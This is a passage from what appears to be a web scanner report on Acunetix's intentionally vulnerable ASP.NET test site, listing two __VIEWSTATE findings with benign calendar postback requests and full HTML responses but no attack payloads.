Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1159 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,159 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8263&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAOEMaf9oIZGRkvQyCR7IUB%2BCvzDCSwRT0JEzsFnA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKGtOawAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Do9Lrx0TlvrywDs44JV4pJUxKQCM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:23:41 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAOEMaf9oIZGRkvQyCR7IUB+CvzDCSwRT0JEzsFnA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKGtOawAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Do9Lrx0TlvrywDs44JV4pJUxKQCM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:White" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8251&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAQ0asddoIZGRkAq9NFnK87N%2B4870qlVFYLvTxRoc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK46G%2FDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DCGl7Tp9SKa4vGb5h%2F%2Fvz8UkzsQE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:50 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAQ0asddoIZGRkAq9NFnK87N+4870qlVFYLvTxRoc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK46G/DwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DCGl7Tp9SKa4vGb5h//vz8UkzsQE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:White" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for 